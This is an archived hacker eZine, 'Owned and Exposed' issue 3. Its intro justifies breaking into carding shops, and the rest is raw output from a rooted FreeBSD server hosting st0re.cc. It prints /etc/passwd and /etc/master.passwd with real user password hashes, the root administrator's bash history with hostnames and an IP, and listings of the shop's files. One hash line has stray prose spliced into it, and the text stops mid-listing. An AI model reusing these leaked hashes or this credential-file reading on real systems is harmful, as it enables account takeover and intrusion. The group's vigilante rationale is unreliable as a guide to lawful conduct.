[eZine] Owned and Exposed - ISSUE no 3

EDB-ID:

18074

CVE:

N/A




Platform:

eZine

Date:

2011-11-04


                                                      |\___/|         
              -=[ISSUE - NO 3]=-                     =) ^Y^ (=        
                   -=[OF]=-                           \  ^  /         
                                                       )=*=(          
 ______________________________ __ ____________ _     /     \         
|.-----.--.--.--.-----.-----.--|  |   ___ ___ _| ||   |     |         
||  _  |  |  |  |     |  -__|  _  |  | . |   | . ||  /| | | |\        
||_____|________|__|__|_____|_____|  |__,|_|_|___||  \| | |_|/\       
|  | |                                   ______   |__//_// ___/ __    
|  | |               .-----.--.--.-----.|      |.-----.--\_).--|  ||  
|  | |               |  -__|_   _|  _  ||  ||  ||__ --|  -__|  _  ||  
|  | |               |_____|__.__|   __||  ||  ||_____|_____|_____||  
|_/   \__________________________|__|___|  ||  |___________________|  
                                        |______|                      
                                                                      
     Featuring...     .---.     /\     Brought to you by       .---.  
                     /  .  \   /  \        your Happy Ninjas  /  .  \ 
                    |\_/|   | |    |                         |\_/|   |
                    |   |  /| | b  |                         |   |  /|
  .-----------------------' | |  a |   .---------------------------' |
 /  .-.                     | | c  |  /  .-.                         |
|  /   \  Intro             | |  k | |  /   \  The Happy Ninja Faker |
| |\_.  | St0re.cc          | |    | | |\_.  | Swissfaking.net       |
|\|  | /| El-Basar.biz      | |    | |\|  | /| Vpn24.org             |
| `---' |                   | | o  | | `---' |                       |
|       |------------------'  |  n | |       |----------------------' 
\       |             .---.   | c  | \       |                 .---.  
 \     /             /  .  \  |  e |  \     /                 /  .  \ 
  `---'             |\_/|   | |    |   `---'                 |\_/|   |
                    |   |  /| |    |                         |   |  /|
  .-----------------------' | | a  |   .---------------------------' |
 /  .-.                     | |  g |  /  .-.                         |
|  /   \  Undercover.su     | | a  | |  /   \   Secure-Host.in       |
| |\_.  | k!LLu's Botnet    | |  i | | |\_.  |  Unique-Crew.net      |
|\|  | /|                   | | n  | |\|  | /|                       |
| `---' |                   | |    | | `---' |                       |
|       |------------------'  |    | |       |----------------------' 
\       |             .---.   |  h | \       |                 .---.  
 \     /             /  .  \  | e  |  \     /                 /  .  \ 
  `---'             |\_/|   | |  r |   `---'                 |\_/|   |
                    |   |  /| | e  |                         |   |  /|
  .-----------------------' | |    |   .---------------------------' |
 /  .-.                     | |    |  /  .-.                         |
|  /   \  Zion-Network.net  | |  t | |  /   \   Some leftovers       |
| |\_.  | Hackbase.cc       | | o  | | |\_.  |  Outro                |
|\|  | /|                   | |    | |\|  | /|                       |
| `---' |                   | |    | | `---' |                       |
|       |------------------'  |  r | |       |----------------------' 
\       |                     | m  | \       |                        
 \     /                      |    |  \     /                         
  `---'                       | /\ |   `---'                          
                      :\______|/  \|______/:                          
                       \__0day______0day__/                           
 	                      | /\ |                                  
                              ||  ||                                  
                              ||  ||                                  
                              ||  ||                                  
                              ||  ||                                  
                              | \/ |                                  
                              \____/                                  
                              (____)                                  

First of all, here is the verification of the sha1 hash  we  published
when hba-crew got  owned:  49bd4433fff1b04530dcaff1f52fa971ff895871  =
sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03)

        ,;~;,
           /\_
          (  /
          (()      //)
          | \\  ,,;;'\
      __ _(  )m=((((((((((((((========={    Intro    }=========-------
    /'  ' '()/~' '.(, |
 ,;(      )||     |  ~ Tonight's the night. And it's going to  happen,
,;' \    /-(.;,   )  again and again. It has to happen.
     ) /       ) /  
    //         ||  We all  want to  welcome you  to a brand new  issue
   )_\         )_\ of  Owned and  exp0sed! Before  we  get to the  fun
part, we'd just like to clarify some things since there has been a lot
going on on the internet since our last issue.

Movements,  as  they  put  it,  like  Anonymous  or  the   short-lived
phenomenon of Lulzsec have gotten an increasingly important  topic  to
media and the public. We want to line out our motivation  in  contrast
to theirs. Anonymous has tried to gain  as  much  media  attention  as
possible by inflicting the most damage possible on big  companies  and
service providers. Similarily, Lulzsec have attacked various  websites
and published an enormous amount of information.

However, while it's their goal to put up pressure on  governments  and
big organizations, it's ours to protect the public from the abysses of
the internet. Fraud is our main concern and we intent to contain it as
much as possible. While Anon and Lulzsec toss out their  stuff  within
weeks, we take our time to gain access, collect data and aggregate  it
nicely for you, our readers.  This  is  why  there  is  a  substantial
time span between our releases.

We of course also monitor the German and international fraud scene  as
it recovers from our attacks; it's hard  to  stop  something  that  is
driven by selfishness, greed and money. We also find it worrying  that
Anonymous and especially Lulzsec act  in  what  they  call  "Operation
Antisec". The original Antisec Movement was brought to life by  actual
hackers and  targeted  full  disclosure  and  the  corporate  security
industry. Publishing gigantic  amounts  of  (corporate)  data  on  the
internet does exactly the opposite: It provides the security  industry
with the attention they need and hence new customers.

But let's now look at why we are here today. "Money is the root of all
evil" as the proverb has it; and it's why fraud  communities  do  come
back after we have owned and exposed them; but as long as  they  carry
on, we do, too. Fraudsters ought to know that they're not safe because
we are going  to  hunt  down  every  single  site  that  is  left.  We
experience the fraud scene scattering  wider  and  wider  after  every
issue we have published; new boards, and with them new admins,  emerge
out of nowhere. That just shows well again how stubborn fraudsters are
as most of them still refuse to accept that they lost their  right  to
exist on the internet. It's particularly  frustrating that they  don't
seem to draw lessons from getting owned again and again.

That being said we can just strongly advise you to spend your time  on
something worthwhile. It's not too late ...
                                                         ,;~;,        
                                                        _/\           
                                                        \  )          
                                                (\\      ())          
                                                /';;,,  // |          
-------========={  St0re.cc  }==========))))))))))))))=m(  )_ __      
                                               | ,(.' '~/()' '  '\    
Let's head to our first target.  Fraud or scene ~  |     ||(      );, 
shops in  general have not been our main concern.  (   ,;.)-\    / ';,
During   our   many  break-ins  in  other   fraud   \ (       \ (     
communities,  we often  were dazzled  with glaring   ||         \\    
banners of underground markets where you could buy  /_(        /_(    
"fresh" CCs, PayPal accounts or socks5 proxies to stay "secure"  while
carding. So by now we got the hint that it might be worth finding  out
out how often and by whom these shops were  really  used.  It's  quite
impressive how much money you  can  make  by  simply  stealing  PayPal
accounts with a RAT and not using it for fraud but for selling  it  to
scammers instead. That's why we clicked on the first banner we saw and
concluded that it would be a noble action to  root.  We  actually  got
pretty lucky since st0re.cc was not the only credit card store on that
server. We spotted some others like the infamous El-Basar.biz (it  was
already shown in a German tv show), the rest is not worth to  mention.
Anyway this is what you get if you decide to buy  credit  cards  in  a
webshop: You will get owned and exposed. Like always.

# uname -a
FreeBSD 6.4-RELEASE-p11 i386 i386 SMP-GENERIC

# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

# cat /etc/passwd  
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin
nukeuploads:*:1001:1001:User &:/home/nukeuploads:/bin/sh
ayoga:*:1002:1002:User &:/home/ayoga:/sbin/nologin
alg:*:1004:1004:User &:/home/alg:/bin/sh
propiska:*:1005:1005:User &:/home/propiska:/sbin/nologin
msk:*:1007:1007:User &:/home/msk:/sbin/nologin
vestacomp:*:1006:1006:User &:/home/vestacomp:/sbin/nologin
crank2010:*:1016:1016:User &:/home/crank2010:/sbin/nologin
lordknight:*:1019:1019:User &:/home/lordknight:/bin/sh
madrage:*:1003:1003:User &:/home/madrage:/bin/sh
scenehack:*:1008:1008:User &:/home/scenehack:/sbin/nologin
thefuelru:*:1009:1009:User &:/home/thefuelru:/sbin/nologin
mr101:*:1021:1021:User &:/home/mr101:/bin/sh
szenevz:*:1011:1011:User &:/home/szenevz:/sbin/nologin
exchanger:*:1012:1012:User &:/home/exchanger:/bin/sh
filip:*:1023:1023:User &:/home/filip:/sbin/nologin
mmgen:*:1018:1018:User &:/home/mmgen:/sbin/nologin
ganymedes:*:1024:1024:User &:/home/ganymedes:/sbin/nologin
garf:*:1031:1031:User &:/home/garf:/sbin/nologin
onlineschauen:*:1013:1013:User &:/home/onlineschauen:/bin/sh
snetwork:*:1022:1022:User &:/home/snetwork:/sbin/nologin
useresu:*:1010:1010:User &:/home/useresu:/sbin/nologin
useresu1:*:1026:1026:User &:/home/useresu1:/sbin/nologin
margosha:*:1020:1020:User &:/home/margosha:/sbin/nologin
pavlrse:*:1027:1027:User &:/home/pavlrse:/sbin/nologin
muraaat:*:1000:1000:User &:/home/muraaat:/sbin/nologin
test4me:*:1014:1014:User &:/home/test4me:/bin/sh

# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
cyrus:*:60:60::1172782800:0:the cyrus mail server:/nonexistent:/usr/sbin/nologin
nukeuploads:$1$hO28fqpU$OL/RovJhduUxEqR3kBawe.:1001:1001::0:0:User &:/home/nukeuploads:/bin/sh
ayoga:$1$CNCuqfrs$p7QpuHI6jagkVUyvGO5MI.:1002:1002::0:0:User &:/home/ayoga:/sbin/nologin
alg:$1$A07..akS$.TPW7o0ZCO25bB6AltS/Q.:1004:1004::0:0:User &:/home/alg:/bin/sh
propiska:$1$Hgb0peXw$2wtRLXytI9Mmwbsxi/RAI.:1005:1005::0:0:User &:/home/propiska:/sbin/nologin
msk:$1$yqxdalvS$IPYorMt8h.pMqc3V8mdED0:1007:1007::0:0:User &:/home/msk:/sbin/nologin
vestacomp:$1$bL6RZJ2K$f7CTWRj.ps2Q9XuImy4sI1:1006:1006::0:0:User &:/home/vestacomp:/sbin/nologin
crank2010:*:1016:1016::0:0:User &:/home/crank2010:/sbin/nologin
lordknight:*:1019:1019::0:0:User &:/home/lordknight:/binbreak-ins  in  other fraud/sh
madrage:*:1003:1003::0:0:User &:/home/madrage:/bin/sh
scenehack:*:1008:1008::0:0:User &:/home/scenehack:/sbin/nologin
thefuelru:*:1009:1009::0:0:User &:/home/thefuelru:/sbin/nologin
mr101:*:1021:1021::0:0:User &:/home/mr101:/bin/sh
szenevz:*:1011:1011::0:0:User &:/home/szenevz:/sbin/nologin
exchanger:*:1012:1012::0:0:User &:/home/exchanger:/bin/sh
filip:$1$asb5GyOE$OHPPapNFMf6zKA5FvrIpE/:1023:1023::0:0:User &:/home/filip:/sbin/nologin
mmgen:$1$bnXQT0ng$obWjcBQFTBTKk83ElXfDt0:1018:1018::0:0:User &:/home/mmgen:/sbin/nologin
ganymedes:$1$95EongK1$fFPWI1ePR8VKBIAQ/LwUu0:1024:1024::0:0:User &:/home/ganymedes:/sbin/nologin
garf:$1$xzEPVuNH$26jps1eOPu2hNObvlcgkH0:1031:1031::0:0:User &:/home/garf:/sbin/nologin
onlineschauen:$1$RihNUTco$hzbht5CwvI/h3X0cGe8T91:1013:1013::0:0:User &:/home/onlineschauen:/bin/sh
snetwork:$1$y0T7yJX4$ER.mYpG3P21qlz3qgQWtN.:1022:1022::0:0:User &:/home/snetwork:/sbin/nologin
useresu:$1$6J5xPk5F$sfpn5pAKTlf10hX3kSKkv.:1010:1010::0:0:User &:/home/useresu:/sbin/nologin
useresu1:$1$gPsMDoWO$.Ve9Z8tEQLZrlF7MrP6ZH1:1026:1026::0:0:User &:/home/useresu1:/sbin/nologin
margosha:*:1020:1020::0:0:User &:/home/margosha:/sbin/nologin
pavlrse:$1$AKfcvELm$oImAlQWKKDaEd.dimM6wY/:1027:1027::0:0:User &:/home/pavlrse:/sbin/nologin
muraaat:*:1000:1000::0:0:User &:/home/muraaat:/sbin/nologin
test4me:$1$nNH.D3yA$2KQeYLwqG3TcFHOc9toFL0:1014:1014::0:0:User &:/home/test4me:/bin/sh

# pwd 
/root

# ls -la
total 715748
drwxr-xr-x   4 root  wheel        512 Sep  9 04:43 .
drwx--x--x  18 root  wheel        512 Apr 12 19:59 ..
-rw-------   1 root  wheel      10017 Sep 26 02:59 .bash_history
-rw-------   1 root  wheel         67 Sep  9 17:00 .cvspass
-rw-------   1 root  wheel         50 Feb  9  2011 .lesshst
drwxr-xr-x   3 root  wheel        512 Sep 26 02:57 .mc
-rw-------   1 root  wheel       1344 May 20 03:24 .mysql_history
drwx------   2 root  wheel        512 Aug 14 19:22 .ssh
-rwxr-xr-x   1 root  wheel        241 Jul 21 00:11 addban.sh
-rw-r--r--   1 root  wheel     601437 Apr 12 17:56 apache.log
-rwxr-xr-x   1 root  wheel         89 Mar  6  2010 apache_watchdog.php
-rwxr-xr-x   1 root  wheel       4184 Feb  2  2011 mydumpsplitter.sh
-rwxr-xr-x   1 alg   www    365607550 Feb  1  2011 zzz.sql

# cat .bash_history
apachectl restart
exit
tail -f /var/log/httpd/httpd_access.log 
tail -f /var/log/httpd/httpd_access.log 
/usr/local/etc/rc.d/apache22 restart
top -S
tail -f /var/log/httpd/httpd_access.log 
/usr/local/etc/rc.d/apache22 restart
/usr/local/etc/rc.d/apache22 restart
/usr/local/etc/rc.d/apache22 restart
cd /home/alg/
mc
mysql -u root -p`cat /etc/my.passwd `
cd db_split/
mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql
ls -la
mcedit postindex.sql 
mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < adminlog.sql 
mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < attachment.sql 
top
cd ..
wget
wget http://platon.sk/cvs/cvs.php/___checkout___/scripts/perl/mysql/mysqldump-convert.pl?rev=1.5&content-type=text/plain mysqldump-convert.pl
mc
ls
mcedit mysqldump-convert.pl\?rev\=1.5 
mc
cat db_split/postindex.sql | ./mysqldump-convert.pl > postindex.sql
mcedti postindex.sql 
mcedit postindex.sql 
mcedit mysqldump-convert.pl 
mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql
exit
mc
/usr/local/etc/rc.d/apache22 restart
top
mc
date
exit
mc
cd /home/nukeuploads/nukeuploads.com/
chown nukeuploads:nukeuploads google4973efd9f5db5c16.html
mc
apachectl restart
uptime
top
tail -n 1000 /var/log/httpd/httpd_access.log 
ps aux | grep nginx
mc
exit
apachectl stop
uptime
uptime
uptime
uptime
uptime
top
apachectl start
exit
tail -n 1000 /var/log/httpd/httpd_access.log 
exit
top
apachectl restart
top
tail -n 1000 /var/log/httpd/httpd_access.log 
tail -n 1000 /var/log/httpd/httpd_access.log 
exit
apachectl restart
top
exit
tail -f /var/log/httpd/httpd_access.log 
apachectl stop
killall -9 httpd
apachectl start
tail -f /var/log/httpd/httpd_access.log 
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
mc -d
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
top
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
top
top
uptime
uptime
uptime
uptime
uptime
uptime
top
cd /home/kirbysho/
mc
uptime
uptime
uptime
mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf 
apachectl restart
top
mc
mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf 
apachectl restart
uptime
uptime
uptime
uptime
uptime
uptime
top
tail -n 100 /var/log/httpd/httpd_access.log 
uptime
uptime
uptime
uptime
top
exit
apachectl restart
exit
tail -f /var/log/httpd/httpd_access.log 
killall -9 httpd 
apachectl restart
top
tail -f /var/log/httpd/httpd_access.log 
tail -f /var/log/httpd/httpd_access.log 
tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru
mc -d
date
date
date
date
date
date
date
date
killall -9 httpd
apachectl start
tail -f /var/log/httpd/httpd_access.log 
tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru
tail -n 10000 /var/log/httpd/httpd_access.log | grep "russian-elite" > /root/apache.log
mc
killall -9 httpd
apachectl start
top
tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru
killall -9 httpd
apachectl start
tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru
cat /var/log/httpd/httpd_access.log | grep kirby-shop.ru > /var/log/httpd_kirby.log
cat /var/log/httpd/httpd_access.log 
cat/var/log/httpd_kirby.log
cp /var/log/httpd_kirby.log
cp /var/log/httpd_kirby.log /home/kirbysho/
ls /home/kirbysho/
exit
tail -f /var/log/httpd/httpd_access.log 
tail -f /var/log/httpd/httpd_access.log 
top
top
ps ax
tail -f /var/log//httpd/httpd_access.log 
tail -f /var/log//httpd/httpd_access.log 
ps ax
top
ls -l
ping ya.ru
ping google.com
exit
mc
tail -f /var/log/httpd/httpd_access.log 
mc
mc
mysql -unukeuploads_gla -p -h db.nukeuploads.com nukeuploads_gla
mysql -unukeuploads_gla -p -h 
mysql -unukeuploads_gla -p -h 
mysql -unukeuploads_gla -p -h 92.241.164.71 nukeuploads_gla
mc
nslookup
mc
nslookup
tail -n 1000 /var/log/httpd/httpd_access.log 
exit
tail -n 1000 /var/log/httpd/httpd_access.log 
top
exit
tail -f /var/log/httpd/httpd_access.log 
tail -f /var/log/httpd/httpd_access.log 
tail -f /var/log/httpd/httpd_access.log 
tail -n 1000 /var/log/httpd/httpd_access.log 
exit
tail -n 100 /var/log/httpd/httpd_access.log 
tail -n 100 /var/log/httpd/httpd_access.log  | grep russian | wc -l
exit
tail -f /var/log/httpd/httpd_access.log 
touch ~/addban.sh
chmod +x ~/addban.sh 
mcedit ~/addban.sh 
tail -n 100 /world/sec1005/var/log/httpd/httpd_access.log  | grep 'swissfaking.net' | awk '{print }' | sort | uniq -c | sort -n | awk '{if ($1>3) print $2}'
/usr/local/etc/rc.d/apache22 restart
/usr/local/etc/rc.d/apache22 restart
tail -f /var/log/httpd/httpd_access.log 
tail -f /var/log/httpd/httpd_access.log 
/usr/local/etc/rc.d/nginx status
tail -f /var/log/httpd/httpd_access.log 
tail -f /var/log/httpd/httpd_access.log 
tail -f /var/log/httpd/httpd_access.log 
tcpdump -nn host  187.160.244.66
tcpdump -nni bge0 host  187.160.244.66
tcpdump -nni bge0 host 187.160.244.66
sort /var/log/httpd/httpd_load.log | awk '{print $1}' | uniq -c
mc
mc -d
php -V
php -v
mysql -v
mysql -V
top
mc
ls -la
cd /home/margosha/
ls -la
pwd
mc
killall -9 mc
ls -la
cd forum.la2amadis.ru/
ls -la
cd ..
ls -la
chown -cRv margosha:www ./*
chown -cRv margosha:www ./*
chown -cR margosha:www ./*
chown -R margosha:www ./*
ls -la
cd forum.la2amadis.ru/
ls -la
cd ..
ls -la
cd la2amadis.ru/
ls -la
mc
ps ax
w
ps axu
ps axu
tail -f /var/log/httpd/httpd_access.log 
exit
ps wauxf
cat /proc/22623/cmdline 
kill -9 22623
ps wauxf
df -h
cd /home/toco123/
ls -la
cd 00/
ls -la
mc
killall -9 mc
ps wauxf
df -h
ls /tmp
ls -la
ls -la /tmp/
ps wauxf
df -h
w
cd /
ls -la
cat /etc/fsta
ps wauxf
kill -9 22623
cd /tmp/
ls -la
rm a.*
ls -la
tail -f /var/log/httpd/httpd_access.log 
w
ps wauxf
ifconfig 
cd /home/
ls -la
mc
cd /home/margosha/
tar czfv backup.tgz forum.la2amadis.ru la2amadis.ru
mc
chown margosha:www backup.tgz 
mc
php -v
cd /usr/ports/mail/php-imap
cd /usr/ports/
cd ./mail
ls |grep imap
cd php5-imap
make install clean
cd /usr/local/etc/
ls
mc
mc
cd /usr/ports/mail/php52-imap
make install clean
cd /usr/ports/mail/php5-imap
make install clean
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
cd /usr/ports/mail/php52-imap
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
cd /usr/ports/ports-mgmt/portdowngrade
make install clean
make install clean
cd /usr/ports/mail/php5-imap
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
cd /usr/ports/mail/php5-imap
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
php -m
whereis portdowngrade
cd /usr/ports/ports-mgmt/portdowngrade
make install clean
cd /usr/ports/devel/popt
make install clean
cd /usr/ports/devel/libtool22
make install clean
cd -
make install clean
uname -a
php -v
cd /usr/ports/lang/php52-extensions/
make config
make
cd ../php5-extensions/
make config
make
php -v
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
touch /root/.cvspass
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
php -v
portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 -o anoncvs
portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -o=anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5
server_args = -f --allow-root=/test pserver
cat /etc/inetd.conf 
cat /etc/inetd.conf  | grep allow
portdowngrade -s :pserver:anoncvs@cvsup13.tw.freebsd.org:/home/ncvs lang/php5
portdowngrade -s :pserver:cvsup13.tw.freebsd.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@cvsup13.fr.freebsd.org:/home/ncvs lang/php5
mc
php -v | grep imap
php -m | grep imap
portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs2.FreeBSD.org:/home/ncvs lang/php5
php -v
portdowngrade lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncv lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -r -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :login:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s ":pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs" lang/php5
portdowngrade -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5
portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5
portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5
cd /usr/ports/mail/php5-imap/
make config
make
cd ..
cd ..
mc
cd distfiles/
fetch http://downloads.php.net/ilia/php-5.2.5.tar.bz2
cd ..
cd mail/php5-imap/
make 
make install
php -m
php -m | grep imap
ls /var/db/pkg/| grep extre
ls /var/db/pkg/| grep exte
ls
mc

# cd /home/mmgen

total 44
drwxr-x---   7 mmgen  www      512 Jun 11 13:18 .
drwx--x--x  28 root   wheel   1024 Sep 14 17:31 ..
drwxrwx---   5 mmgen  www      512 Jun 11 15:22 dodo.st0re.cc
drwxrwx---   8 mmgen  www     1024 Sep 30 16:19 st0re.cc
drwxrwx---   3 mmgen  www      512 Jan 26  2011 st0re.mmgen.st0re
drwxrwx---   4 mmgen  www      512 Dec  2  2010 st0re.morgen.w2c.ru
drwxrwx---   2 mmgen  www    10240 Oct  1 16:32 temp

# cd dodo.st0re.cc

# ls -la
total 96
drwxrwx---  5 mmgen  www    512 Jun 11 15:22 .
drwxr-x---  7 mmgen  www    512 Jun 11 13:18 ..
drwxr-xr-x  2 mmgen  www    512 Jun 11 15:21 css
drwxr-xr-x  4 mmgen  www   2048 Jun 11 15:23 images
-rw-r--r--  1 mmgen  www  38106 Jun 11 15:23 index.html
drwxr-xr-x  2 mmgen  www    512 Jun 11 15:21 js
# cd ..

# cd st0re.mmgen.st0re

# ls -la
total 16
drwxrwx---  3 mmgen  www   512 Jan 26  2011 .
drwxr-x---  7 mmgen  www   512 Jun 11 13:18 ..
drwxr-xr-x  4 mmgen  www  1536 Jan 26  2011 Neues Verzeichnis
-rw-r--r--  1 mmgen  www  1034 Dec  2  2010 index.html

# cd "Neues Verzeichnis"

# ls -la
total 237856
drwxr-xr-x  4 mmgen  www      1536 Jan 26  2011 .
drwxrwx---  3 mmgen  www       512 Jan 26  2011 ..
-rw-r--r--  1 mmgen  www     12326 Jan 26  2011 2.pl
-rw-r--r--  1 mmgen  www      3790 Jan 26  2011 2.png
-rw-r--r--  1 mmgen  www    697711 Jan 26  2011 22.png
-rw-r--r--  1 mmgen  www       164 Jan 26  2011 280539654158.kwm
-rw-r--r--  1 mmgen  www      1608 Jan 26  2011 280539654158.pwm
-rw-r--r--  1 mmgen  www     40882 Jan 26  2011 4.jpg
-rw-r--r--  1 mmgen  www     40505 Jan 26  2011 Banner4.jpg
-rw-r--r--  1 mmgen  www      1280 Jan 26  2011 Command Prompt.lnk
-rw-r--r--  1 mmgen  www       231 Jan 26  2011 Data.txt
-rw-r--r--  1 mmgen  www       900 Jan 26  2011 Daten.rtf
-rw-r--r--  1 mmgen  www    661429 Jan 26  2011 Enterpage.png
-rw-r--r--  1 mmgen  www    126738 Jan 26  2011 Enterpage_for_gamekings_eu_by_Frizzl3.jpg
